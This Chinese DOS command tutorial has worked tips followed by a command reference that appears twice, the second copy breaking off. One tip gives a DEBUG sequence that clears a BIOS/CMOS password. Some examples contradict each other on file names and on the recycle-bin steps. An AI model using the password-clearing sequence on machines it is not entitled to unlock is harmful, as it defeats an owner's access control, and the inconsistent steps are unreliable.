    使用方法：首先在安装软件前把注册表导出为一个文件如：“1.reg”，在安装软件后再导出为一个文件如：“2.reg”。这两个文件假设都放在C盘根目录下。我们进入MS-DOS方式输入“C：\fc 1.reg 2.reg”回车。看到了没有？屏幕上显示的正是注册表被改动的地方。

    注：FC默认逐行比较两个文件。文件中每一行的长度应小于256个字符，如果行长超过256个字符或者比较对象是二进制文件或程序文件，应在后面加上/b参数，FC将对它们逐字节比较。

案例二、“>”—定向输出

    我们接着上面的案例。有的时候我们在用上面的方法时发现屏幕不停地往上滚动，好多信息一闪而过停都停不下来，这种情况是由于两个文件相差太大的缘故，文件被改动的地方太多了。怎么办呢﹖别着急，这时候我们要用到另外一个小技巧——使用定向输出“>”

    格式：命令(或程序)>定向输入设备(或文件名)

    使用方法：我们还用上面的例子，在DOS下输入C：\fc 1.reg 2.reg ＞change.txt回车。

    怎么什么信息都没了啊。其实你仔细看一下就会发现在该目录下多了一个FC.txt文件，快用写字板打开它啊，里面可是放着这两个文件的全部比较信息呀：）so easy 吧。

    注：你可以把它输出为任何格式的文件，它们都可以以文本方式打开。

    案例三、“copy”—文件合并

    有很多时候网上把视频文件分割成好多小段让大家分别下载，可是下载好的文件在看的时候又老是不停地要打开，那么有没有什么办法让它们重新合并成一个整的文件呢?用专门的视频编辑工具固然可以，可是那繁琐的E文让我辈头痛。其实DOS下就有现成的工具，用我们常用的“copy”命令就可以完成，让我们来看看吧。

    格式：copy /b ＜filename1＞+＜filename2＞+…+＜filenameN＞＞filename＞

    使用方法：假设你的硬盘有两个文件分别是video1.mpg 和 video2.mpg 那么我们在该目录下输入“copy /b video1.mpg+video2.mpg video.mpg”就可以了，其中video.mpg是你合并后生成的新文件名。赶紧试一试，打开播放器看看是不是拼合好了。

    当然，你喜欢的小说、音乐，如果嫌不停地打开关闭太麻烦，不妨试试这个方法把它们合并在一起观看。

    案例四、“copy”—批量重命名

    一个朋友要做项目需要把一系列文本文件按编号重新命名，可是由于数量实在太多，在Windows中一点点地改太麻烦了，头都大了：（有没有简单一点的方法呢﹖）好多杂志上介绍了好多工具和方法来实现这个，可是我觉得都比较麻烦。其实我们把DOS命令和回收站结合使用就可以完成批量改名。

    使用方法：假设E盘上有大量要改名的文件，那么首先把它们弄到回收站里!（切记!仅仅只是删除，不要清空回收站啊，文件丢了我可不负责!），然后我们进入MS-DOS模式下的E盘，在根目录下输入“cd recycled”进入回收站，dir看看，是不是所有的文件名都改变成有顺序的了：）接下来我们把它们都给拷贝出来。输入“copy *.* e：\”哈哈，返回Windows去看看吧是不是所有的文件都为DE1、DE2……了。

    注：1.删除之前要先清空“回收站”，否则文件将有可能从未知数字基数开始。

    2.在哪个盘删除的就进入哪个盘的recycled文件夹，别的盘里没有对应文件的。

    3.文件名被修改后命名格式为DX1，D是固定的表示DISK，X是对应你的盘符，如果是在F盘就是DF1，如果是D盘就是DD1，依此类推。

案例五、“copy”—改文件日期

    某同事因为工作需要要修改文件的日期，在Windows中忙乎了半天也不知道该怎么改：（难道我们真的只能求助于专用工具了吗?其实不然，同样是使用copy命令就可以轻松完成：）

    格式：copy ＜filename＞+

    使用方法：假设我们要修改的文件是redate.dat文件，它在C盘，那么我们首先进入MS-DOS方式，在C盘下输入“copy 123.dat+，，”（注：加号后面紧跟2个逗号）回车后系统会询问你是否覆盖?这时键入“Y”即更改为当前日期，是不是非常简单啊?

    案例六、FDISK—修复引导区

    同事今天开机突然发现系统无法启动，屏幕提示“No System，System Halted”其实根据提示我们可以知道，问题肯定出在硬盘的引导区上。这种情况一般是引导记录损坏或被病毒感染，或是分区表中无自举标志，还有可能是结束标志55AAH被改写而造成的。

    格式：fdisk /MBR

    使用办法：用DOS引导盘启动电脑，在提示符下执行“FDISK /MBR”命令。FDISK中本身就包含有主引导程序代码和结束标志55AAH，这一招对于修复主引导记录和结束标志55AAH既快又灵，而且不用担心会损坏任何硬盘上的文件!

案例七、“ping”—查看是否连线

    在网吧上网时服务器突然断线，网管在解决故障，看他忙得满头大汗我们都不好意思问“什么时候可以通”。可是总不能打开个网页不停按刷新吧，这个时候用一个简单的DOS命令就可以在最短的时间内检测出什么时候能连上线了，而且还不用那么费事：）

    格式：ping ＜count name＞ -t

    使用方法：在MS-DOS模式下执行“ping www.XXX.com -t”就可以啦：）你可以看到屏幕不停地上滚，如果是通的话就会显示“Reply from xxx.xxx.xxx.xxx： bytes=32 ……”的信息，否则就显示“Destination host unreachable”。这样你就可以一边干别的一边在第一时间知道什么时候网络是通的啦。

    案例八、“debug”—破解COMS

    朋友的品牌机CMOS被他无意中锁住了，怎么办呢﹖这时候你也许会说打开机箱给电池放电不就行了吗。可是品牌机如果拆了机箱多半保修的问题就泡汤了。其实DOS下有个非常好用的工具来解开这个密码——DEBUG。由于这个是个工具，它实在太博大精深了，所以没法给出格式。不过可以跟着我一步步地做，咱们不学太多，只就事论事不就成了。

    启动系统后进入DOS模式，如果是Windows Me（XP）则用启动盘启动，在DOS下输入以下指令：

    debug
    -o70 21
    -o71 20
    -q

    好了，咱们重新启动电脑看看是不是已经解开了：

    关于案例分析咱们就先说到这里了，虽然DOS已经落伍淘汰离我们远去了，可是当你的系统出现蓝屏时、当你的系统崩溃时、当你对一些问题的解决觉得烦琐时，也许DOS能给你最好的答案。

    说明：以上各方法均可在微软任何操作系统环境下使用，所有外部程序在Windows 98的启动盘中均可以找到。

    技术网站：www.163164.com 或 www.163164.cn　 QQ 3149886


Dos命令全集 (Ant)

《一键清理系统垃圾》

Dos命令全集　(Ant)

请使用Ctrl+F来搜索您要查找的命令

一）MD——建立子目录

1．功能：创建新的子目录

2．类型：内部命令

3．格式：MD[盘符：][路径名]〈子目录名〉

4．使用说明：

（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；

（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。

例：（1）在C盘的根目录下创建名为FOX的子目录；（2）在FOX子目录下再创建USER子目录。

C：、＞MD FOX （在当前驱动器C盘下创建子目录FOX）

C：、＞MD FOX 、USER （在FOX 子目录下再创建USER子目录）

（二）CD——改变当前目录

1．功能：显示当前目录

2．类型：内部命令

3．格式：CD[盘符：][路径名][子目录名]

4．使用说明：

（1）如果省略路径和子目录名则显示当前目录；

（2）如采用“CD、”格式，则退回到根目录；

（3）如采用“CD.。”格式则退回到上一级目录。

例：（1）进入到USER子目录；（2）从USER子目录退回到子目录；（3）返回到根目录。

C:、＞CD FOX 、USER（进入FOX子目录下的USER子目录）

C:、FOX、USER＞CD.。 （退回上一级根目录）

C：、FOX＞CD、 （返回到根目录）

C：、＞

（三）RD——删除子目录命令

1．功能：从指定的磁盘删除了目录。

2．类型：内部命令

3．格式：RD[盘符：][路径名][子目录名]

4．使用说明：

（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用DEL（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用RD命令删除该了目录本身；

（2）不能删除根目录和当前目录。

例：要求把C盘FOX子目录下的USER子目录删除，操作如下：

第一步：先将USER子目录下的文件删空；

C、＞DEL C：、FOX、USER、*。*

第二步，删除USER子目录。

C、＞RD Ｃ：、FOX、USER

（四）DIR——显示磁盘目录命令

1．功能：显示磁盘目录的内容。

2．类型：内部命令

3．格式：DIR [盘符][路径][/P][/W]

4． 使用说明：/P的使用；当欲查看的目录太多，无法在一屏显示完屏幕会一直往上卷，不容易看清，加上/P参数后，屏幕上会分面一次显示23行的文件信息，然后暂停，并提示；Press any key to continue

/W的使用：加上/W只显示文件名，至于文件大小及建立的日期和时间则都省略。加上参数后，每行可以显示五个文件名。

PATH——路径设置命令

1．功能：设备可执行文件的搜索路径，只对文件有效。

2．类型：内部命令

3．格式：PATH[盘符1]目录[路径名1]{[；盘符2：]，〈目录路径名2〉…}

4．使用说明：

（1）当运行一个可执行文件时，DOS会先在当前目录中搜索该文件，若找到则运行之；若找不到该文件，则根据PATH命令所设置的路径，顺序逐条地到目录中搜索该文件；

（2）PATH命令中的路径，若有两条以上，各路径之间以一个分号“；”隔开；

（3）PATH命令有三种使用方法：

PATH[盘符1：][路径1][盘符2：][路径2]…（设定可执行文件的搜索路径）

PATH：（取消所有路径）

PATH：（显示目前所设的路径）

（六）TREE——显示磁盘目录结构命令

1．功能：显示指定驱动器上所有目录路径和这些目录下的所有文件名。

2．类型：外部命令

3．格式：TREE[盘符：][/F][》PRN]

4．使用说明：

（1）使用/F参数时显示所有目录及目录下的所有文件，省略时，只显示目录，不显示目录下的文件；

（2）选用＞PRN参数时，则把所列目录及目录中的文件名打印输出。

（七）DELTREE——删除整个目录命令

1．功能：将整个目录及其下属子目录和文件删除。

2．类型：外部命令

3．格式：DELTREE[盘符：]〈路径名〉

4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！

五、磁盘操作类命令

（一）FORMAT——磁盘格式化命令

1．功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。

2．类型：外部命令

3．格式：FORMAT〈盘符：〉[/S][/4][/Q]

4．使用说明：

（1）命令后的盘符不可缺省，若对硬盘进行格式化，则会如下列提示：WARNING:ALL DATA ON NON ——REMOVABLE DISK

DRIVE C:WILL BE LOST ！

Proceed with Format (Y/N)？

（警告：所有数据在C盘上，将会丢失，确实要继续格式化吗？）

（2）若是对软盘进行格式化，则会如下提示：Insert mew diskette for drive A;

and press ENTER when ready…

（在A驱中插入新盘，准备好后按回车键）。

（3）选用[/S]参数，将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM复制到磁盘上，使该磁盘可以做为DOS启动盘。若不选用/S参数，则格式化后的磙盘只能读写信息，而不能做为启动盘；

（4）选用[/4]参数，在1.2MB的高密度软驱中格式化360KB的低密度盘；

（5）选用[/Q]参数，快速格式化，这个参数并不会重新划分磁盘的磁道貌岸然和扇区，只能将磁盘根目录、文件分配表以及引导扇区清成空白，因此，格式化的速度较快。

（6）选用[/U]参数，表示无条件格式化，即破坏原来磁盘上所有数据。不加/U，则为安全格式化，这时先建立一个镜象文件保存原来的FAT表和根目录，必要时可用UNFORMAT恢复原来的数据。

（二）UNFORMAT恢复格式化命令

1．功能：对进行过格式化误操作丢失数据的磁盘进行恢复。

2．类型：外部命令

3．格式：UNFORMAT〈盘符〉[/L][/U][/P][/TEST]

4．使用说明：用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区（包括FAT、根目录、BOOT扇区及硬盘分区表）受损时，也可以用UNFORMAT来抢救。

（1）选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息，但不会真的做FORMAT工作。

（2）选用/P参数将显示于屏幕的报告（包含/L参数所产生的信息）同时也送到打印机。运行时屏幕会显示：“Print out will be sent to LPT1”

（3）选用/TEST参数只做模拟试验（TEST）不做真正的写入动作。使用此参数屏幕会显示：“Simulation only”

（4）选用/U参数不使用MIRROR映像文件的数据，直接根据磁盘现状进行UNFORMAT。

（5）选用/PSRTN；修复硬盘分区表。

若在盘符之后加上/P、/L、/TEST之一，都相当于使用了/U参数，UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。

注意：UNFORMAT对于刚FORMAT的磁盘，可以完全恢复，但FORMAT后若做了其它数据的写入，则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的，由于使用UNFORMAT会重建FAT与根目录，所以它也具有较高的危险性，操作不当可能会扩大损失，如果仅误删了几个文件或子目录，只需要利用UNDELETE就够了。
三） CHKDSK——检查磁盘当前状态命令

1．功能：显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。

2．类型：外部命令

3．格式：CHKDSK [盘符：][路径][文件名][/F][/V]

4．使用说明：

（1）选用[文件名]参数，则显示该文件占用磁盘的情况；

（2）选[/F]参数，纠正在指定磁盘上发现的逻辑错误；

（3）选用[/V]参数，显示盘上的所有文件和路径。

（四）DISKCOPY——整盘复制命令

1．功能：复制格式和内容完全相同的软盘。

2．类型：外部命令

3．格式：DISKCOPY[盘符1：][盘符2：]

4．使用说明：

（1）如果目标软盘没有格式化，则复制时系统自动选进行格式化。

（2）如果目标软盘上原有文件，则复制后将全部丢失。

（3）如果是单驱动器复制，系统会提示适时更换源盘和目标盘，请操作时注意分清源盘和目标盘。

（五）LABEL——建立磁盘卷标命令

1．功能：建立、更改、删除磁盘卷标。

2．类型：外部命令

3．格式：LABEL[盘符：][卷标名]

4．使用说明：

（1）卷标名为要建立的卷标名，若缺省此参数，则系统提示键入卷标名或询问是否删除原有的卷标名；

（2）卷标名由1至11个字符组成。

（六）VOL——显示磁盘卷标命令

1．功能：查看磁盘卷标号。

2．类型：内部命令

3．格式：VOL[盘符：]

4．使用说明：省略盘符，显示当前驱动器卷标。

（七）SCANDISK——检测、修复磁盘命令

1．功能：检测磁盘的FAT表、目录结构、文件系统等是否有问题，并可将检测出的问题加以修复。

2．类型：外部命令

3．格式：SCANDISK[盘符1：]{[盘符2：]…}[/ALL]

4．使用说明：

（1）CCANDISK适用于硬盘和软盘，可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘；

（2）可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误，并加以修复。

（八）DEFRAG——重整磁盘命令

1．。功能：整理磁盘，消除磁盘碎块。

2．类型：外部命令

3．格式：DEFRAG[盘符：][/F]

4．使用说明：选用/F参数，将文件中存在盘上的碎片消除，并调整磁盘文件的安排，确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。

（九）SYS——系统复制命令

1．功能：将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。

2．类型：外部命令

3．格式：SYS[盘符：]

*使用说明：如果磁盘剩余空间不足以存放系统文件，则提示：No roomfor on destination disk.

文件操作类命令

（一） COPY文件复制命令

1．功能：拷贝一个或多个文件到指定盘上。

2．类型：内部命令

3．格式：COPY [源盘][路径]〈源文件名〉[目标盘][路径][目标文件名]

4．使用说明：

（1）COPY是文件对文件的方式复制数据，复制前目标盘必须已经格式化；

（2）复制过程中，目标盘上相同文件名称的旧文件会被源文件取代；

（3）复制文件时，必须先确定目标般有足够的空间，否则会出现；insufficient的错误信息，提示磁盘空间不够；

（4）文件名中允许使用通配举“*”“？”，可同时复制多个文件；

（5）COPY命令中源文件名必须指出，不可以省略。

（6）复制时，目标文件名可以与源文件名相同，称作“同名拷贝”此时目标文件名可以省略；

（7）复制时，目标文件名也可以与源文件名不相同，称作“异名拷贝”，此时，目标文件名不能省略；

（8）复制时，还可以将几个文件合并为一个文件，称为“合并拷贝”，格式如下：COPY；[源盘][路径]〈源文件名1〉〈源文件名2〉…[目标盘][路径]〈目标文件名〉；

（9）利用COPY命令，还可以从键盘上输入数据建立文件，格式如下：COPY CON [盘符：][路径]〈文件名〉；

（10）注意：COPY命令的使用格式，源文件名与目标文件名之间必须有空格！

（二）XCOPY——目录复制命令

1．功能：复制指定的目录和目录下的所有文件连同目录结构。

2．类型：外部命令

3．格式：XCOPY [源盘：]〈源路径名〉[目标盘符：][目标路径名][/S][/V][/E]

4．使用说明：

（1）XCOPY是COPY的扩展，可以把指定的目录连文件和目录结构一并拷贝，但不能拷贝隐藏文件和系统文件；

（2）使用时源盘符、源目标路径名、源文件名至少指定一个；

（3）选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数，否则/S不会拷贝空目录，若不指定/S参数，则XCOPY只拷贝源目录本身的文件，而不涉及其下的子目录；

（4）选用/V参数时，对的拷贝的扇区都进行较验，但速度会降低。

（三）TYPE——显示文件内容命令

1．功能：显示ASCII码文件的内容。

2．类型：内部命令。

3．格式：TYPE[盘符：][路径]〈文件名〉

4．使用说明：

（1）显示由ASCII码组成的文本文件，对。EXE.COM等为扩展名的文件，其显示的内容是无法阅读的，没有实际意义2；

（2）该命令一次只可以显示一个文件的内容，不能使用通配符；

（3）如果文件有扩展名，则必须将扩展名写上；

（4）当文件较长，一屏显示不下时，可以按以下格式显示；TYPE[盘符：][路径]〈文件名〉|MORE，MORE为分屏显示命令，使用些参数后当满屏时会暂停，按任意键会继续显示。

（5）若需将文件内容打印出来，可用如下格式：

TYPE[盘符：][路径]〈文件名〉，＞PRN

此时，打印机应处于联机状态。

（四） REN——文件改名命令

1．功能：更改文件名称

2．类型：内部命令

3．格式：REN[盘符：][路径]〈旧文件名〉〈新文件名〉

4．使用说明：

（1）新文件名前不可以加上盘符和路径，因为该命令只能对同一盘上的文件更换文件名；

（2）允许使用通配符更改一组文件名或扩展名。

（五）FC——文件比较命令

1．功能：比较文件的异同，并列出差异处。

2．类型：外部命令

3．格式：FC[盘符：][路径名]〈文件名〉[盘符：][路径名][文件名][/A][/B][/C][/N]

4．使用说明：

（1）选用/A参数，为ASCII码比较模式；

（2）选用/B参数，为二进制比较模式；

（3）选用/C参数，将大小写字符看成是相同的字符。

（4）选用/N参数，在ASCII码比较方式下，显示相异处的行号。

（六）ATTRIB——修改文件属性命令

1．功能：修改指定文件的属性。（文件属性参见2.5.4（二）文件属性一节）

2．类型：外部命令。

3．格式：ATTRIB[文件名][R][——R][A][——A][H][——H][——S]

4．使用说明：

（1）选用R参数，将指定文件设为只读属性，使得该文件只能读取，无法写入数据或删除；选用——R参数，去除只读属性；

（2）选用A参数，将文件设置为档案属性；选用——A参数，去除档案属性；

（3）选用H参数，将文件调协为隐含属性；选用——H参数，去隐含属性；

（4）选用S参数，将文件设置为系统属性；选用——S参数，去除系统属性；

（5）选用/S参数，对当前目录下的所有子目录及作设置。

七） DEL——删除文件命令

1．功能：删除指定的文件。

2．类型：内部命令

3．格式：DEL[盘符：][路径]〈文件名〉[/P]

4．使用说明：

（1）选用/P参数，系统在删除前询问是否真要删除该文件，若不使用这个参数，则自动删除；

（2）该命令不能删除属性为隐含或只读的文件；

（3）在文件名称中可以使用通配符；

（4）若要删除磁盘上的所有文件（DEL*·*或DEL·），则会提示：(Arey ou sure？）（你确定吗？）若回答Y，则进行删除，回答N，则取消此次删除作业。

（八） UNDELETE——恢复删除命令

1．功能：恢复被误删除命令

2．类型：外部命令。

3．格式：UNDELETE[盘符：][路径名]〈文件名〉[/DOS]/LIST][/ALL]

4．使用说明：使用UNDELETE可以使用“*”和“？”通配符。

（1）选用/DOS参数根据目录里残留的记录来恢复文件。由于文件被删除时，目录所记载斩文件名第一个字符会被改为E5，DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件，所以，UNDELETE会要求用户输入一个字符，以便将文件名字补齐。但此字符不必和原来的一样，只需符合DOS的文件名规则即可。

（2）选用/LIST只“列出”符合指定条件的文件而不做恢复，所以对磁盘内容完全不会有影响。

（3）选用/ALL自动将可完全恢复的文件完全恢复，而不一一地询问用户，使用此参数时，若UNDELTE利用目录里残留的记录来将文件恢复，则会自动选一个字符将文件名补齐，并且使其不与现存文件名相同，选用字符的优选顺序为：#%——0000123456789A~Z。

UNDELETE还具有建立文件的防护措施的功能，已超出本课程授课范围，请读者在使用些功能时查阅有关DOS手册。

七、其它命令

（一）CLS——清屏幕命令

1功能：清除屏幕上的所有显示，光标置于屏幕左上角。

2类型：内部命令

3格式：CLS

（二） VER查看系统版本号命令

1功能：显示当前系统版本号

2类型：内部命令

3格式：VER

（三） DATA日期设置命令

1功能：设置或显示系统日期。

2类型：内部命令

3格式：DATE[mm——dd——yy]

4使用说明：

（1）省略[mm——dd——yy]显示系统日期并提示输入新的日期，不修改则可直接按回车键，[mm——dd——yy]为“月月——日日——年年”格式；

（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。

（四） TIME系统时钟设置命令

1功能：设置或显示系统时期。

2类型：内部命令

3格式：TIME[hh：mm：ss：xx]

4使用说明：

（1）省略[hh：mm：ss：xx]，显示系统时间并提示输入新的时间，不修改则可直接按回车键，[hh：mm：ss：xx]为“小时：分钟：秒：百分之几秒”格式；

（2）当机器开始启动时，有自动处理文件（AUTOEXEC.BAT）被执行，则系统不提示输入系统日期。否则，提示输入新日期和时间。

（五）MEM查看当前内存状况命令

1功能：显示当前内存使用的情况

2类型：外部命令

3格式：MEM[/C][/F][/M][/P]

4使用说明：

（1）选用/C参数列出装入常规内存和CMB的各文件的长度，同时也显示内存空间的使用状况和最大的可用空间；

（2）选用/F参数分别列出当前常规内存剩余的字节大小和UMB可用的区域及大小；

（3）选用/M参数显示该模块使用内存地地址、大小及模块性质；

（4）选用/P参数指定当输出超过一屏时，暂停供用户查看。

（六） MSD显示系统信息命令

1功能：显示系统的硬件和操作系统的状况。

2类型：外部命令

3格式：MSD[/I][/B][/S]

4使用说明：

（1）选用/I参数时，不检测硬件；

（2）选用/B参数时，以黑白方式启动MSD；

（3）选用/S参数时，显示出简明的系统报告

    技术网站：www.163164.com 或 www.163164.cn　 QQ 3149886


DOS命令全集

《一键清理系统垃圾》

DOS命令全集

DOS命令全集(第一讲)

                  一）MD――建立子目录
1．功能：创建新的子目录
2．类型：内部命令
3．格式：MD[盘符：][路径名]〈子目录名〉
4．使用说明：
（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；
（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。
例：（1）在C盘的根目录下创建名为FOX的子目录；（2）在FOX子目录下再创建USER子目录。
C：、＞MD FOX （在当前驱动器C盘下创建子目录FOX）
C：、＞MD FOX 、USER （在FOX 子目录下再创建USER子目录）
（二）CD――改变当前目录
1．功能：显示当前目录
2．类型：内部命令
3．格式：CD[盘符：][路径名][子目录名]
4．使用说明：
（1）如果省略路径和子目录名则显示当前目录；
（2）如采用“CD、”格式，则退回到根目录；
（3）如采用“CD.。”格式则退回到上一级目录。
例：（1）进入到USER子目录；（2）从USER子目录退回到子目录；（3）返回到根目录。
C:、＞CD FOX 、USER（进入FOX子目录下的USER子目录）
C:、FOX、USER＞CD.。 （退回上一级根目录）
C：、FOX＞CD、 （返回到根目录）
C：、＞

DOS命令全集(第二讲)

                  （三）RD――删除子目录命令
1．功能：从指定的磁盘删除了目录。
2．类型：内部命令
3．格式：RD[盘符：][路径名][子目录名]
4．使用说明：
（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用DEL（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用RD命令删除该了目录本身；

（2）不能删除根目录和当前目录。
例：要求把C盘FOX子目录下的USER子目录删除，操作如下：
第一步：先将USER子目录下的文件删空；
C、＞DEL C：、FOX、USER、*。*
第二步，删除USER子目录。
C、＞RD Ｃ：、FOX、USER

（四）DIR――显示磁盘目录命令
1．功能：显示磁盘目录的内容。
2．类型：内部命令
3．格式：DIR [盘符][路径][/P][/W]

4． 使用说明：/P的使用；当欲查看的目录太多，无法在一屏显示完屏幕会一直往上卷，不容易看清，加上/P参数后，屏幕上会分面一次显示23行的文件信息，然后暂停，并提示；Press any key to continue
/W的使用：加上/W只显示文件名，至于文件大小及建立的日期和时间则都省略。加上参数后，每行可以显示五个文件名。

DOS命令全集(第三讲)

                  （五）PATH――路径设置命令
1．功能：设备可执行文件的搜索路径，只对文件有效。
2．类型：内部命令
3．格式：PATH[盘符1]目录[路径名1]{[；盘符2：]，〈目录路径名2〉…}
4．使用说明：
（1）当运行一个可执行文件时，DOS会先在当前目录中搜索该文件，若找到则运行之；若找不到该文件，则根据PATH命令所设置的路径，顺序逐条地到目录中搜索该文件；
（2）PATH命令中的路径，若有两条以上，各路径之间以一个分号“；”隔开；
（3）PATH命令有三种使用方法：
PATH[盘符1：][路径1][盘符2：][路径2]…（设定可执行文件的搜索路径）
PATH：（取消所有路径）
PATH：（显示目前所设的路径）
（六）TREE――显示磁盘目录结构命令
1．功能：显示指定驱动器上所有目录路径和这些目录下的所有文件名。
2．类型：外部命令
3．格式：TREE[盘符：][/F][》PRN]
4．使用说明：
（1）使用/F参数时显示所有目录及目录下的所有文件，省略时，只显示目录，不显示目录下的文件；
（2）选用＞PRN参数时，则把所列目录及目录中的文件名打印输出。
（七）DELTREE――删除整个目录命令
1．功能：将整个目录及其下属子目录和文件删除。
2．类型：外部命令
3．格式：DELTREE[盘符：]〈路径名〉

4．使用说明：该命令可以一步就将目录及其下的所有文件、子目录、更下层的子目录一并删除，而且不管文件的属性为隐藏、系统或只读，只要该文件位于删除的目录之下，DELTREE都一视同仁，照删不误。使用时务必小心！！！

DOS命令全集(第四讲)

                  五、磁盘操作类命令
（一）FORMAT――磁盘格式化命令
1．功能：对磁盘进行格式化，划分磁道和扇区；同时检查出整个磁盘上有无带缺陷的磁道，对坏道加注标记；建立目录区和文件分配表，使磁盘作好接收DOS的准备。
2．类型：外部命令
3．格式：FORMAT〈盘符：〉[/S][/4][/Q]
4．使用说明：
（1）命令后的盘符不可缺省，若对硬盘进行格式化，则会如下列提示：WARNING:ALL DATA ON NON ――REMOVABLE DISK
DRIVE C:WILL BE LOST ！
Proceed with Format (Y/N)？
（警告：所有数据在C盘上，将会丢失，确实要继续格式化吗？）
（2）若是对软盘进行格式化，则会如下提示：Insert mew diskette for drive A;
and press ENTER when ready…
（在A驱中插入新盘，准备好后按回车键）。

（3）选用[/S]参数，将把DOS系统文件IO.SYS 、MSDOS.SYS及COMMAND.COM复制到磁盘上，使该磁盘可以做为DOS启动盘。若不选用/S参数，则格式化后的磙盘只能读写信息，而不能做为启动盘；
（4）选用[/4]参数，在1.2MB的高密度软驱中格式化360KB的低密度盘；
（5）选用[/Q]参数，快速格式化，这个参数并不会重新划分磁盘的磁道貌岸然和扇区，只能将磁盘根目录、文件分配表以及引导扇区清成空白，因此，格式化的速度较快。

（6）选用[/U]参数，表示无条件格式化，即破坏原来磁盘上所有数据。不加/U，则为安全格式化，这时先建立一个镜象文件保存原来的FAT表和根目录，必要时可用UNFORRMAT恢复原来的数据。
（二）UNFORMAT恢复格式化命令
1．功能：对进行过格式化误操作丢失数据的磁盘进行恢复。
2．类型：外部命令
3．格式：UNFORMAT〈盘符〉[/L][/U][/P][/TEST]
4．使用说明：用于将被“非破坏性”格式化的磁盘恢复。根目录下被删除的文件或子目录及磁盘的系统扇区（包括FAT、根目录、BOOT扇区及硬盘分区表）受损时，也可以用UNFORMAT来抢救。
（1）选用/L参数列出找到的子目录名称、文件名称、大孝日期等信息，但不会真的做FORMAT工作。
（2）选用/P参数将显示于屏幕的报告（包含/L参数所产生的信息）同时也送到打印机。运行时屏幕会显示：“Print out will be sent to LPT1”
（3）选用/TEST参数只做模拟试验（TEST）不做真正的写入动作。使用此参数屏幕会显示：“Simulation only”
（4）选用/U参数不使用MIRROR映像文件的数据，直接根据磁盘现状进行UNFORMAT。
（5）选用/PSRTN；修复硬盘分区表。
若在盘符之后加上/P、/L、/TEST之一，都相当于使用了/U参数，UNFORMAT会“假设”此时磁盘没有MIRROR映像文件。

注意：UNFORMAT对于刚FORMAT的磁盘，可以完全恢复，但FORMAT后若做了其它数据的写入，则UNFORMAT就不能完整的救回数据了。UNFORMAT并非是万能的，由于使用UNFORMAT会重建FAT与根目录，所以它也具有较高的危险性，操作不当可能会扩大损失，如果仅误删了几个文件或子目录，只需要利用UNDELETE就够了。

DOS命令全集(第五讲)

                  （三） CHKDSK――检查磁盘当前状态命令
1．功能：显示磁盘状态、内存状态和指定路径下指定文件的不连续数目。
2．类型：外部命令
3．格式：CHKDSK [盘符：][路径][文件名][/F][/V]
4．使用说明：
（1）选用[文件名]参数，则显示该文件占用磁盘的情况；
（2）选[/F]参数，纠正在指定磁盘上发现的逻辑错误；
（3）选用[/V]参数，显示盘上的所有文件和路径。
（四）DISKCOPY――整盘复制命令
1．功能：复制格式和内容完全相同的软盘。
2．类型：外部命令
3．格式：DISKCOPY[盘符1：][盘符2：]
4．使用说明：
（1）如果目标软盘没有格式化，则复制时系统自动选进行格式化。
（2）如果目标软盘上原有文件，则复制后将全部丢失。
（3）如果是单驱动器复制，系统会提示适时更换源盘和目标盘，请操作时注意分清源盘和目标盘。

（五）LABEL――建立磁盘卷标命令
1．功能：建立、更改、删除磁盘卷标。
2．类型：外部命令
3．格式：LABEL[盘符：][卷标名]
4．使用说明：
（1）卷标名为要建立的卷标名，若缺省此参数，则系统提示键入卷标名或询问是否删除原有的卷标名；
（2）卷标名由1至11个字符组成。

（六）VOL――显示磁盘卷标命令
1．功能：查看磁盘卷标号。
2．类型：内部命令
3．格式：VOL[盘符：]
4．使用说明：省略盘符，显示当前驱动器卷标。

DOS命令全集(第六讲)

                  （七）SCANDISK――检测、修复磁盘命令
1．功能：检测磁盘的FAT表、目录结构、文件系统等是否有问题，并可将检测出的问题加以修复。
2．类型：外部命令
3．格式：SCANDISK[盘符1：]{[盘符2：]…}[/ALL]
4．使用说明：
（1）CCANDISK适用于硬盘和软盘，可以一次指定多个磁盘或选用[/ALL]参数指定所有的磁盘；
（2）可自动检测出磁盘中所发生的交叉连接、丢失簇和目录结构等逻辑上的错误，并加以修复。
（八）DEFRAG――重整磁盘命令
1．。功能：整理磁盘，消除磁盘碎块。
2．类型：外部命令
3．格式：DEFRAG[盘符：][/F]
4．使用说明：选用/F参数，将文件中存在盘上的碎片消除，并调整磁盘文件的安排，确保文件之间毫无空隙。从而加快读盘速度和节省磁盘空间。
（九）SYS――系统复制命令
1．功能：将当前驱动器上的DOS系统文件IO.SYS,MSDOS.SYS和COMMAND.COM 传送到指定的驱动器上。
2．类型：外部命令
3．格式：SYS[盘符：]
*使用说明：如果磁盘剩余空间不足以存放系统文件，则提示：No roomfor on destination disk.

DOS命令全集(第七讲)

                  文件操作类命令
（一） COPY文件复制命令
1．功能：拷贝一个或多个文件到指定盘上。
2．类型：内部命令
